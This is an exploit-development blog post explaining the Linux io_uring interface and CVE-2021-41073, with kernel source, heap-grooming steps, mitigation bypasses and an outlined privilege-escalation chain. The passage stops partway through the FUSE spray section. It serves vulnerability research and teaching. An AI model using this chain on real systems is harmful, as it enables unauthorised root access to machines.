<p style="text-align: center;"><sub><i>Original Date Published: March 8, 2022</i></sub></p>
![[62270d310fc0e771bbf3ea30_main_iou_imagemain_iouring.png]]
This blog posts covers `io_uring`, a new Linux kernel system call interface, and how I exploited it for local privilege escalation (LPE)
A breakdown of the topics and questions discussed:
* What is `io_uring`? Why is it used?
* What is it used for?
* How does it work?
* How do I use it?
* Discovering an 0-day to exploit, [CVE-2021-41073 [13]](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41073).
* Turning a type confusion vulnerability into memory corruption
* Linux kernel memory fundamentals and tracking.
* Exploring the `io_uring` codebase for tools to construct exploit primitives.
* Creating new Linux kernel exploitation techniques and modifying existing ones.
* Finding target objects in the Linux kernel for exploit primitives.
* Mitigations and considerations to make exploitation harder in the future.
Like my [last post](https://chompie.rip/Blog+Posts/Kernel+Pwning+with+eBPF+-+a+Love+Story), I had no knowledge of `io_uring` when starting this project. This blog post will document the journey of tackling an unfamiliar part of the Linux kernel and ending up with a working exploit. My hope is that it will be useful to those interested in binary exploitation or kernel hacking and demystify the process. I also break down the different challenges I faced as an exploit developer and evaluate the practical effect of current exploit mitigations.
## io_uring: What is it?
Put simply, `io_uring` is a system call interface for Linux. It was first introduced in upstream Linux Kernel version 5.1 in 2019 [ [1]](https://blogs.oracle.com/linux/post/an-introduction-to-the-io-uring-asynchronous-io-framework). It enables an application to initiate system calls that can be performed asynchronously. Initially, `io_uring` just supported simple I/O system calls like `read()` and `write()`, but support for more is continually growing, and rapidly. It may eventually have support for most system calls [ [5]](https://lwn.net/Articles/810414/).
### Why is it Used?
The motivation behind `io_uring` is performance. Although it is still relatively new, its performance has improved quickly over time. Just last month, the creator and lead developer [Jens Axboe](https://twitter.com/axboe) boasted 13M per-core peak IOPS [ [2]](https://web.archive.org/web/20221130215710/https://twitter.com/axboe/status/1483790445532512260). There are a few key design elements of `io_uring` that reduce overhead and boost performance.
With `io_uring` system calls can be completed asynchronously. This means an application thread does not have to block while waiting for the kernel to complete the system call. It can simply submit a request for a system call and retrieve the results later; no time is wasted by blocking.
Additionally, batches of system call requests can be submitted all at once. A task that would normally requires multiple system calls can be reduced down to just 1. There is even a new feature that can reduce the number of system calls down to zero [ [7]](https://unixism.net/loti/tutorial/sq_poll.html). This vastly reduces the number of [context switches](https://en.wikipedia.org/wiki/Context_switch) from user space to kernel and back. Each context switch adds overhead, so reducing them has performance gains.
In `io_uring` a bulk of the communication between user space application and kernel is done via shared buffers. This reduces a large amount of overhead when performing system calls that transfer data between kernel and userspace. For this reason, `io_uring` can be a zero-copy system [ [4]](https://unixism.net/loti/what_is_io_uring.html).
There is also a feature for “fixed” files that can improve performance. Before a read or write operation can occur with a file descriptor, the kernel must take a reference to the file. Because the file reference occurs [atomically](https://stackoverflow.com/questions/15054086/what-does-atomic-mean-in-programming/15054186), this causes overhead [ [6]](https://kernel.dk/io_uring.pdf). With a fixed file, this reference is held open, eliminating the need to take the reference for every operation.
The overhead of blocking, context switches, or copying bytes may not be noticeable for most cases, but in high performance applications it can start to matter [ [8]](https://unixism.net/loti/async_intro.html). It is also worth noting that system call performance has regressed after workaround patches for [Spectre and Meltdown](https://meltdownattack.com/), so reducing system calls can be an important optimization [ [9]](https://www.theregister.com/2021/06/22/spectre_linux_performance_test_analysis/).
### What is it Used for?
As noted above, high performance applications can benefit from using `io_uring`. It can be particularly useful for applications that are server/backend related, where a significant proportion of the application time is spent waiting on I/O.
### How Do I Use it?
Initially, I intended to use `io_uring` by making `io_uring` system calls directly (similar to what I did for [eBPF](https://chompie.rip/Blog+Posts/Kernel+Pwning+with+eBPF+-+a+Love+Story)). This is a pretty arduous endeavor, as `io_uring` is complex and the user space application is responsible for a lot of the work to get it to function properly. Instead, I did what a real developer would do if they wanted their application to make use of `io_uring` - use [`liburing`](https://github.com/axboe/liburing).
`liburing` is the user space library that provides a simplified API to interface with the `io_uring` kernel component [ [10]](https://github.com/axboe/liburing). It is developed and maintained by the lead developer of `io_uring`, so it is updated as things change on the kernel side.
One thing to note: `io_uring` does not implement versioning for its structures [ [11]](https://windows-internals.com/ioring-vs-io_uring-a-comparison-of-windows-and-linux-implementations/). So if an application uses a new feature, it first needs to check whether the kernel of the system it is running on supports it. Luckily, the [io_uring_setup](https://web.archive.org/web/20221130215710/https://manpages.debian.org/unstable/liburing-dev/io_uring_setup.2.en.html) system call returns this information.
Because of the fast rate of development of both `io_uring` and `liburing`, the available [documentation](https://unixism.net/loti/ref-liburing/) is out of date and incomplete. Code snippets and examples found online are inconsistent because new functions render the old ones obsolete (unless you already know `io_uring` very well, and want to have more low level control). This is a typical problem for [OSS](https://en.wikipedia.org/wiki/Open-source_software), and is not an indicator of the quality of the library, which is very good. I’m noting it here as a warning, because I found the initial process of using it somewhat confusing. Often times I saw fundamental behavior changes across kernel versions that were not documented.
_For a fun example, check out this_ [_blog post_](https://web.archive.org/web/20221130215710/https://wjwh.eu/posts/2021-10-01-no-syscall-server-iouring.html) _where the author created a server that performs zero syscalls per request_ [_[3]](https://wjwh.eu/posts/2021-10-01-no-syscall-server-iouring.html).
### How Does it Work?
As its name suggests, the central part of the `io_uring` model are two [ring buffers](https://en.wikipedia.org/wiki/Circular_buffer)that live in memory shared by user space and the kernel. An io_uring instance is initialized by calling the [`io_uring_setup`](https://manpages.debian.org/unstable/liburing-dev/io_uring_setup.2.en.html) syscall. The kernel will return a file descriptor, which the user space application will use to create the shared memory mappings.
The mappings that are created:
- The **submission queue (SQ),** a ring buffer, where the system call requests are placed.
- The **completion queue (CQ),** a ring buffer, where completed system call requests are placed.
- The **submission queue entries (SQE)** array, of which the size is chosen during setup.
![[6225483516a3443aaa5d928d_Frame 11.png]]
<p style="text-align: center;"><sub><i>Mappings are created to share memory between user space and kernel</i></sub></p>
A SQE is filled out and placed in the submission queue ring for every request. A single SQE describes the system call operation that should be performed. The kernel is notified there is work in the SQ when the application makes an [io_uring_enter](https://manpages.debian.org/unstable/liburing-dev/io_uring_enter.2.en.html) system call. Alternatively, if the [IORING_SETUP_SQPOLL](https://unixism.net/loti/tutorial/sq_poll.html) feature is used, a kernel thread is created to poll the SQ for new entries, eliminating the need for the `io_uring_enter` system call.
![[62254a2816a3441cd95dfbf7_IOURING_2iouring2.png]]
<p style="text-align: center;"><sub><i>An application submitting a request for a read operation to io_uring</i></sub></p>
When completing each SQE, the kernel will first determine whether it will execute the operation asynchronously. If the operation can be done without blocking, it will be completed synchronously in the context of the calling thread. Otherwise, it is placed in the kernel async work queue and is completed by an `io_wrk` worker thread asynchronously. In both cases the calling thread won’t block, the difference is whether the operation will be completed immediately by the calling thread or an `io_wrk` thread later.
![[62254e7e026fe04d274416c8_IOURING_3 (2).png]]
<p style="text-align: center;"><sub><i>io_uring Handling a SQE</i></sub></p>
When the operation is complete, a completion queue entry (CQE) is placed in the CQ for every SQE. The application can poll the CQ for new CQEs. At that point the application will know that the corresponding operation has been completed. SQEs can be completed in any order, but can be linked to each other if a certain completion order is needed.
![[62254e9e080c4815ad3693b7_IOURING_4 (1).png]]<p style="text-align: center;"><sub><i>io_uring completeing a request</i></sub></p>
## Finding a Vulnerability
### Why io_uring?
Before diving into the vulnerability, I will give context on my motivations for looking at `io_uring` in the first place. A question I get asked often is, “_How do I pick where to reverse engineer/look for bugs/exploit etc_.?”. There is no one-size-fits all answer to this question, but I can give insight on my reasoning in this particular case.
I became aware of `io_uring` while doing [research on eBPF](https://chompie.rip/Blog+Posts/Kernel+Pwning+with+eBPF+-+a+Love+Story). These two subsystems are often mentioned together because they both change how user space applications interact with the Linux kernel. I am keen on Linux kernel exploitation, so this was enough to pique my interest. Once I saw how quickly `io_uring` was growing, I knew it would be a good place to look. The old adage is true - new code means new bugs. When writing in an [unsafe programming language like C,](https://www.zdnet.com/article/which-are-the-most-insecure-programming-languages/) which is what the Linux kernel is written in, even the best and most experienced developers make mistakes [ [16]](https://www.zdnet.com/article/which-are-the-most-insecure-programming-languages/).
Additionally, new Android kernels now ship with `io_uring`. Because this feature is not inherently sandboxed by [SELinux](https://en.wikipedia.org/wiki/Security-Enhanced_Linux), it is a good source of bugs that could be used for privilege escalation on Android devices.
To summarize, I chose `io_uring` based on these factors:
- It is a new subsystem of the Linux kernel, which I have experience exploiting.
- It introduces a lot of new ways that an unprivileged user can interact with the kernel.
- New code is being introduced quickly.
- Exploitable bugs have already been found in it.
- Bugs in `io_uring` can be used to exploit Android devices (these are rare, Android is well sandboxed).
### The Vulnerability
As I mentioned previously, `io_uring` is growing quickly, with many new features being added.
One such feature is [IORING_OP_PROVIDE_BUFFERS](https://yhbt.net/lore/all/
[email protected]/T/), which allows the application to register a pool of buffers the kernel can use for operations.
Because of the asynchronous nature of `io_uring`, selecting a buffer for an operation can get complicated. Because the operation won’t be completed for an indefinite amount of time, the application needs to keep track of what buffers are currently [in flight](https://stackoverflow.com/questions/48524418/what-does-in-flight-request-mean-for-a-web-browser) for a request. This feature saves the application the trouble of having to manage this, and treat buffer selection as automatic.
The buffers are grouped by a group ID, `buf_group` and a buffer id, `bid`. When submitting a request, the application indicates that a provided buffer should be used by setting a flag `IOSQE_BUFFER_SELECT` and specifies the group ID. When the operation is complete, the `bid` of the buffer used is passed back via the CQE [ [14]](https://lwn.net/Articles/813311/).
I decided to play around with this feature after I saw the advisory for [CVE-2021-3491](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3491) - a bug found in this same feature found by [Billy Jheng Bing-Jhong](https://twitter.com/st424204). My intention was to try to recreate a crash with this bug, but I was never able to get this feature to work quite right on the user space side. Fortunately, I decided to keep looking at the kernel code anyway, where I found another bug.
When registering a group of provided buffers, the `io_uring` kernel component allocates an [`io_buffer`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L258) structure for each buffer. These are stored in a linked list that contain all the `io_buffer` structures for a given `buf_group`.
```
struct io_buffer {
struct list_head list;
__u64 addr;
__u32 len;
__u16 bid;
};
```
Each request has an associated [`io_kiocb`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L827) structure, where information is stored to be used during completion. In particular, it contains a field named `rw`, which is a [`io_rw`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L558) structure. This stores information about r/w requests:
```
struct io_rw {
struct kiocb kiocb;
u64 addr;
u64 len;
};
```
If a request is submitted with `IOSQE_BUFFER_SELECT` , the function [`io_rw_buffer_select`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L3089) is called before the read or write is performed. Here is where I noticed something strange.
```
static void __user *io_rw_buffer_select(struct io_kiocb *req, size_t *len, bool needs_lock)
{
struct io_buffer *kbuf;
u16 bgid;
kbuf = (struct io_buffer *) (unsigned long) req->rw.addr;
bgid = req->buf_index;
kbuf = io_buffer_select(req, len, bgid, kbuf, needs_lock);
if (IS_ERR(kbuf))
return kbuf;
req->rw.addr = (u64) (unsigned long) kbuf;
req->flags |= REQ_F_BUFFER_SELECTED;
return u64_to_user_ptr(kbuf->addr);
}
```
Here, the pointer for the request’s `io_kiocb` structure is called `req`. On line 7 above, the `io_buffer` pointer for the selected buffer is stored in `req→rw.addr`. This is strange, because this is where the (user space) target address for read/writing is supposed to be stored! And here it is being filled with a kernel address…
It turns out that if a request is sent using the `IOSQE_BUFFER_SELECT` flag, the flag `req->flags &` [`REQ_F_BUFFER_SELECT`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L763) is set on the kernel side. Requests with this flag are handled slightly differently in certain spots in the code. Instead of using `req→rw.addr` for the user space address, `(io_buffer*) kbuf.addr` is used instead.
Using the same field for user and kernel pointers seems dangerous - are there any spots where the `REQ_F_BUFFER_SELECT` case was forgotten and the two types of pointer were confused?
I looked in places where read/write operations were being done. My hope was to find a bug that gives a kernel write with user controllable data. I had no such luck - I didn’t see any places where the address stored in `req→rw.addr` would be used to do read/write if `REQ_F_BUFFER_SELECT` is set. However, I still managed to find a confusion of lesser severity in the function [`loop_rw_iter`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L3226):
```
* For files that don't have ->read_iter() and ->write_iter(), handle them
* by looping over ->read() or ->write() manually.
*/
static ssize_t loop_rw_iter(int rw, struct io_kiocb *req, struct iov_iter *iter)
{
struct kiocb *kiocb = &req-;>rw.kiocb;
struct file *file = req->file;
ssize_t ret = 0;
/*
* Don't support polled IO through this interface, and we can't
* support non-blocking either. For the latter, this just causes
* the kiocb to be handled from an async context.
*/
if (kiocb->ki_flags & IOCB_HIPRI)
return -EOPNOTSUPP;
if (kiocb->ki_flags & IOCB_NOWAIT)
return -EAGAIN;
while (iov_iter_count(iter)) {
struct iovec iovec;
ssize_t nr;
if (!iov_iter_is_bvec(iter)) {
iovec = iov_iter_iovec(iter);
} else {
iovec.iov_base = u64_to_user_ptr(req->rw.addr);
iovec.iov_len = req->rw.len;
}
if (rw == READ) {
nr = file->f_op->read(file, iovec.iov_base,
iovec.iov_len, io_kiocb_ppos(kiocb));
} else {
nr = file->f_op->write(file, iovec.iov_base,
iovec.iov_len, io_kiocb_ppos(kiocb));
}
if (nr < 0) {
if (!ret)
ret = nr;
break;
}
ret += nr;
if (nr != iovec.iov_len)
break;
req->rw.len -= nr;
req->rw.addr += nr;
iov_iter_advance(iter, nr);
}
return ret;
}
```
For each open file descriptor, the kernel keeps an associated [`file`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/fs.h#L965) structure, which contains a [`file_operations`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/fs.h#L2071) structure, `f_op`. This structure holds pointers to functions that perform various operations on the file. As the description for `loop_rw_iter` states, if the type of file being operated on doesn’t implement the `read_iter` or `write_iter` operation, this function is called to do an iterative read/write manually. This is the case for `/proc` filesystem files (like `/proc/self/maps`, for example).
The first part of the offending function performs the proper checks . On line 25 above, the iter structure is checked - if `REQ_F_BUFFER_SELECT` is set then iter is not a bvec, otherwise `req→rw.addr` is used as the base address for read/write.
The bug is found on line 49. As the function name suggests, the purpose is to perform an iterative read/write in a loop. At the end of the loop, the base address is advanced by the size in bytes of the read/write just performed. This is so the base address points to where the last r/w left off, in case another iteration of the loop is needed. For the case of `REQ_F_BUFFER_SELECT`, the base address is advanced by calling `iov_iter_advance` on line 50. No check is performed like in the beginning of the function - both addresses are advanced. This is a type confusion - the code treats the address in `req→rw.addr` as if it were a user space pointer.
Remember, if `REQ_F_BUFFER_SELECT` is set, then `req→rw.addr` is a kernel address and points to the `io_buffer` used to represent the selected buffer. This doesn’t really affect anything during the operation itself, but after it is completed, the function [`io_put_rw_kbuf`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L2409) is called:
```
static inline unsigned int io_put_rw_kbuf(struct io_kiocb *req)
{
struct io_buffer *kbuf;
if (likely(!(req->flags & REQ_F_BUFFER_SELECTED)))
return 0;
kbuf = (struct io_buffer *) (unsigned long) req->rw.addr;
return io_put_kbuf(req, kbuf);
}
```
On line 5 above, the request’s flags are checked for `REQ_F_BUFFER_SELECTED`. If it is set, on line 8 the function [`io_put_kbuf`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L2398) is called with `req→rw.addr` as the kbuf parameter. The code for this called function is below:
```
static unsigned int io_put_kbuf(struct io_kiocb *req, struct io_buffer *kbuf)
{
unsigned int cflags;
cflags = kbuf->bid << IORING_CQE_BUFFER_SHIFT;
cflags |= IORING_CQE_F_BUFFER;
req->flags &= ~REQ_F_BUFFER_SELECTED;
kfree(kbuf);
return cflags;
}
```
As seen on line 8 above, `kfree` is called on `kbuf` (whose value is the address in `req→rw.addr`). Since this pointer was advanced by the size of the read/write performed, the originally allocated buffer isn’t the one being freed! Instead, what effectively happens is:
```
kfree(kbuf + user_controlled_value);
```
where `user_controlled_value` is the size of the completed read or write.
Since an `io_buffer` structure is 32 bytes, we effectively gain the ability to free buffers in the `kmalloc-32` cache at a controllable offset from our originally allocated buffer. I’ll talk a little bit more about Linux kernel memory internals in the next section, but the below diagram gives a visual of the bug:
![[62254ebdee34d32c897e53fe_IOURING_5.png]]
## Exploitation
The previous section covered the vulnerability; now it’s time to construct an exploit. For those who want to skip right to the exploit strategy, it is as follows:
- Set the [affinity](https://en.wikipedia.org/wiki/Processor_affinity) of the exploit application’s threads and `io_wrk` threads to the same CPU core, so they both use the same `kmalloc-32` cache slab.
- Spray the `kmalloc-32` cache with [`io_buffer`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L258) structures to drain all partially free slabs. Subsequent 32 byte allocations will be contiguous in a freshly allocated slab page. Now the vulnerability can be utilized as a use-after-free primitive.
- The use-after-free primitive can be used to construct a universal object leaking, and overwriting primitive.
- Use the object leaking primitive to leak the contents of an [`io_tctx_node`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L890) structure, which contains a pointer to a [`task_struct`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/sched.h#L723) of a thread belonging to our process.
- Use object leaking primitive to leak contents of a [`seq_operations`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/seq_file.h#L31) structure to break [KASLR](https://web.archive.org/web/20221130215710/https://dev.to/satorutakeuchi/a-brief-description-of-aslr-and-kaslr-2bbp).
- Use object spray primitive to allocate a fake [`bpf_prog`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/filter.h#L563) structure.
- Use object leaking primitive to leak contents of a `io_buffer` which contains a `list_head` [field](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L259). This leaks the address of the controllable portion of the heap, which in turn gives the address of the `fake bpf_prog`.
- Use object overwriting primitive to overwrite a [`sk_filter`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/filter.h#L593) structure. This object contains a pointer to the corresponding [eBPF](https://chompie.rip/Blog+Posts/Kernel+Pwning+with+eBPF+-+a+Love+Story) program attached to a socket. Replace the existing `bpf_prog pointer` with the fake one.
- Write to the attached socket to trigger the execution of the fake eBPF program, which is used to escalate privileges. The leaked `task_struct` is used to retrieve the pointer of [`cred`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/cred.h#L110) structure of our process and overwrite [`uid`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/cred.h#L119) and [`euid`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/cred.h#L123).
### Building Primitives
The first step is to develop the exploit primitives. An **exploit primitive** is a generic building block for an exploit. An exploit will usually use multiple primitives together to achieve its goal (code execution, privilege escalation, etc). Some primitives are better than others - for example: arbitrary read and arbitrary write are very strong primitives. The ability to read and write at any address is usually enough to achieve whatever the exploit goal is.
In this case, the initial primitive we gain is pretty weak. We can free a kernel buffer at an offset we control. But we don’t actually know anything about where the buffer is or what is around it. It will take some creativity to turn it into something useful.
### From Type Confusion to Use-After-Free (UAF)
Because we control the freeing of a kernel buffer, it makes the most sense to turn this primitive into a stronger [use-after-free](https://cwe.mitre.org/data/definitions/416.html) primitive. If you aren’t familiar with what a use-after-free is, here’s the basic idea: A program uses some allocated memory, then somehow (either due to a bug or an exploit primitive) that memory is freed. After it is freed, the attacker triggers the reallocation of the same buffer and the original contents are overwritten. If the program that originally allocated the memory uses it after this occurs, it will be using the same memory, but its contents have been reallocated and used for something else! If we can control the new contents of the memory, we can influence how the program behaves. Essentially, it allows for overwriting an object in memory.
![[6225508cb789abaea03e3716_IOURING_7.png]]<p style="text-align: center;"><sub><i>Illustration of a use-after-free exploit</i></sub></p>
Now, the basic plan is simple: allocate an object, use the bug to free it, then reallocate the memory and overwrite with controllable data. At this point, I didn’t know what kind of object to target. First I had to try to overwrite _any_ object in the first place.
This turned out to be a good idea, because initially I was not able to reliably trigger the reallocation of the buffer freed by the bug. As shown below, the freed buffer has a different address than the reallocated buffer.
![[622790a8e7dec1015e688161_printk.png]]
<p style="text-align: center;"><sub><i>Debugging exploit in the kernel with printk()</i></sub></p>
My first inclination was that buffer size had something to do with it. 32 bytes is small, and there are a lot of kernel objects of the same size. Perhaps the race to allocate the freed buffer was lost every single time. I tested this by altering the definition of the `io_buffer` structure in the kernel. After some experimentation with different sizes, I confirmed that buffer size wasn’t the problem.
After learning a bit about Linux kernel memory internals and some debugging, I found the answer. You don’t need to deeply know Linux kernel memory internals to understand this exploit. However, knowing the general idea of how virtual memory is managed can be important for memory corruption vulnerabilities. I’ll give a very basic overview and point out the relevant parts in the next section.
### Linux Kernel Memory: SLOB on my SLAB
The Linux Kernel has several memory allocators in the code tree which include: **SLOB**, **SLAB**, and **SLUB**. They are mutually exclusive - you can only have one of them compiled into the kernel. These allocators represent the memory management layer that works on top of the system’s low level page allocator [ [20]](https://argp.github.io/2012/01/03/linux-kernel-heap-exploitation/).
![[6225548b9a63be14af86d4d8_IOURING_7 (2).png]]
The Linux kernel currently uses the **SLUB** allocator by default. For background, I will give a _very_ brief explanation on how this memory allocator works.
**SLUB** stores several memory caches that each hold the same type of object or generic objects of similar size.
Each one of these caches is represented by a kmem_cache structure, which holds a list of free objects and a list of slabs. Slabs (not to be confused with **SLAB** which is a different Linux kernel memory allocator) consist of one or more pages that are sliced into smaller blocks of memory for allocation. When the list of free objects is empty, a new slab page is allocated. In **SLUB,** each slab page is associated with a CPU. Each free object contains a metadata header that includes a pointer for the next free object in the cache.
Though it isn’t necessary to understand the rest of this post, if you want to know more about the internals of the Linux kernel memory allocators check out these great blog posts [ [20]](https://argp.github.io/2012/01/03/linux-kernel-heap-exploitation/) [ [21]](https://ruffell.nz/programming/writeups/2019/02/15/looking-at-kmalloc-and-the-slub-memory-allocator.html)[ [23]](https://hammertux.github.io/slab-allocator) and these slides [ [22]](https://events.static.linuxfound.org/images/stories/pdf/klf2012_kim.pdf).
### Memory Grooming
The first goal is to get contiguously allocated buffers. Given nature of the bug, the target object for UAF needs to be at a positive offset from the originating `io_buffer` and the offset has to be knowable.
We can start by draining the cache’s freelist and ensuring that a fresh slab page is allocated. Afterwards, subsequent allocations will be contiguous to each other on the same slab page. We do this by triggering the allocation of many 32 byte objects, which can be done by registering many buffers using [`io_uring_prep_provide_buffers`](https://github.com/axboe/liburing/blob/37856ad78b605a388b7ae598a55544c7c6d3abe5/src/include/liburing.h#L635). Remember, an `io_buffer` object will be allocated for each buffer registered.
```
io_uring_prep_provide_buffers(sqe, bufs1, 0x100, 1000, group_id1, 0);
```
The above line of code above triggers the allocation of 1000 32 byte `io_buffer` structures in the kernel. They will each stay in memory until they are used to complete an `io_uring` request. That means they can be kept in memory indefinitely.
When the target object is allocated, it should land next to the `io_buffer` structs that were just sprayed. Luckily, provided buffers for each `buf_group` are used in Last-In-First-Out (LIFO) order. So, the first `io_buffer` used for an operation will be the last one that was allocated. Now the offset to the target object is knowable!
![[62254ed6ee34d345b27e6bfb_IOURING_6.png]]
#### What About CONFIG_SLAB_FREELIST_RANDOM?
The kernel configuration [CONFIG_SLAB_FREELIST_RANDOM](https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_RANDOM.html) (which is set in distributions like Ubuntu) randomizes the order in which buffers get added to the freelist when a new slab page is allocated. This means allocations on a new slab page will not be contiguous in virtual memory.
This mitigation is annoying, but easily by-passable. The first step is the same: spray to ensure an `io_buffer` struct lands in a freshly allocated slab page. Then, spray the cache with target objects. This way, there is a high likelihood of a target object being allocated contiguously to the `io_buffer` that will trigger the freeing. The randomization only applies to the order buffers are added to the freelist - the list itself is still LIFO.
![[622552360461b545e33b7d55_IOURING_9.png]]<p style="text-align: center;"><sub><i>Bypassing CONFIG_SLAB_FREELIST_RANDOM</i></sub></p>
#### Linux Kernel Memory Tracking
There are a lot of ways to track Linux kernel memory. I decided to learn at least one them and chose the [kmem event tracing subsystem](https://www.kernel.org/doc/html/latest/trace/events-kmem.html), which is built using [ftrace](https://www.kernel.org/doc/Documentation/trace/ftrace.txt). I chose it because it seems like the least amount of effort required. I don’t want to write any code - even one line is too many.
The setup is simple, pass the following in the boot parameters in your kernel:
```trace_event=kmem:kmalloc,kmem:kmem_cache_alloc,kmem:kfree,kmem:kmalloc_node```
and you can trace all memory allocations and frees in the kernel by running:
```cat /sys/kernel/debug/tracing/trace```
To deobfuscate the virtual memory addresses you can add `no_hash_pointers` to the kernel boot parameters.
![[62227aa7f00392b8ec4c9685_tdrjnLMm.png]]
<p style="text-align: center;"><sub><i>Tracking kernel memory</i></sub></p>
The first, second, and third columns represent the task name, pid, and the CPU ID of the calling thread, respectively. On the first line, you can see the buffer that is freed by the bug in `io_put_kbuf` (which is inlined into [`kiocb_done`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L2929) during compilation). On the second line, is the attempt to reallocate this freed buffer.
Now with a basic background of how Linux kernel memory and `io_uring` works, can you spot the problem?
The buffer is being freed in a thread running on CPU 0 and the reallocation attempt is happening on CPU 1. Now the problem is obvious! The completion of the `io_uring` read request happens asynchronously, so it happens in the context of an `io_wrk` thread. The reallocation happens in a thread from our process. Remember that cache slab pages are processor specific, so it’s necessary that the free and reallocation occur on the same CPU.
I already knew, from [Jann Horn](https://twitter.com/tehjh)’s [research](https://googleprojectzero.blogspot.com/2019/01/taking-page-from-kernels-book-tlb-issue.html), that [sched_setaffinity](https://man7.org/linux/man-pages/man2/sched_setaffinity.2.html) can be used to pin a thread to run a specific CPU core [ [17]](https://googleprojectzero.blogspot.com/2019/01/taking-page-from-kernels-book-tlb-issue.html). Unfortunately, this only applies to threads from our own application. We also need a way to control the [affinity](https://en.wikipedia.org/wiki/Processor_affinity) of the `io_wrk` thread created by the `io_uring` kernel component.
### Exploring io_uring Features
Because io_uring is performance oriented, I looked for a feature that gives the application control over the affinity of `io_wrk` threads. I got extremely lucky, as this io_uring feature was introduced a [few months prior](https://www.spinics.net/lists/io-uring/msg09009.html) - just in time for me to abuse it [ [18]](https://www.spinics.net/lists/io-uring/msg09009.html). Using `IORING_REGISTER_IOWQ_AFF`, you can set the CPU affinity for `iou_wrk` threads. I can pin the thread from my process and the `iou_wrk` thread to the same CPU core, using `sched_setaffinity` and [`io_uring_register_iowq_aff`](https://github.com/axboe/liburing/blob/37856ad78b605a388b7ae598a55544c7c6d3abe5/src/include/liburing.h#L165) respectively.
Now the reallocation works as expected:
![[62279478b5479c5db996d6fe_realloc.png]]<p style="text-align: center;"><sub><i>Victim buffer from invalid free being reallocated</i></sub></p>
Now that a reallocation can be triggered reliably, let’s figure out what to do with it.
### Universal Heap Spray
Once I was able to successfully turn the bug into a UAF, I immediately revisited [Vitaly Nikolenko](https://twitter.com/vnik5287)’s [research](https://duasynt.com/blog/linux-kernel-heap-spray). He created a Linux kernel exploit technique for a universal heap spray using the [setxattr](https://man7.org/linux/man-pages/man2/setxattr.2.html) system call [ [19]](https://duasynt.com/blog/linux-kernel-heap-spray).
This universal heap spray technique provides a way to:
- Allocate an object of any size
- Control the contents of the object
- Keep the object in memory indefinitely
The `setxattr` system call sets the value of an extended attribute associated with a file. When it is executed, the kernel allocates a buffer (of a size controlled by the calling user space application (line 10 below) and copies the user provided attributes buffer into it (line 13).
```
static long
setxattr(struct user_namespace *mnt_userns, struct dentry *d,
const char __user *name, const void __user *value, size_t size,
int flags)
{
...
if (size) {
if (size > XATTR_SIZE_MAX)
return -E2BIG;
kvalue = kvmalloc(size, GFP_KERNEL);
if (!kvalue)
return -ENOMEM;
if (copy_from_user(kvalue, value, size)) {
error = -EFAULT;
goto out;
}
...
error = vfs_setxattr(mnt_userns, d, kname, kvalue, size, flags);
out:
kvfree(kvalue);
return error;
}
```
[userfaultfd](https://man7.org/linux/man-pages/man2/userfaultfd.2.html) allows a user space application to handle page faults, something that would otherwise be handled by the kernel. That means that if the memory pointed to by `value` in the above code is registered with `userfaultfd`, the `copy_from_user` call will block until the application resolves the page fault.
Now imagine mapping two adjacent pages of memory, and the second page has a `userfaultfd` page handler set. The value buffer is of size `n : n-8` bytes are on the first page and the remaining 8 bytes on the second page. The kernel will handle the page fault of the first page and copy `n-8` bytes into the kernel buffer. Then, it will block for the final 8 bytes waiting for user space to resolve the page fault of the second page.
With this technique, an unprivileged application can allocate a kernel object of size `n` written with `n-8` bytes of controllable data, and the object stays in memory indefinitely.
![[622551faa79daff0b74d2a25_iouring_8.png]]
<p style="text-align: center;"><sub><i>Universal heap spray technique</i></sub></p>
### userfaultfd is over, FUSE is in
The Linux kernel now provides a `Kconfig` knob to disable `userfaultfd` for unprivileged users, `vm.unprivileged_userfaultfd`. It is set to true by default in most major Linux distributions.
However, the same primitive can be achieved by an [unprivileged user](https://twitter.com/tehjh/status/1438330352075001856) using **[FUSE](https://www.kernel.org/doc/html/latest/filesystems/fuse.html) [ [24]](https://twitter.com/tehjh/status/1438330352075001856)**. **FUSE** provides a framework for implementing a filesystem in user space. What does this mean for exploitation? Files on a **FUSE** filesystem can have read/writes forwarded to a user space application. We can block the kernel during user space copy/writes by using a memory mapping of a **FUSE** file.
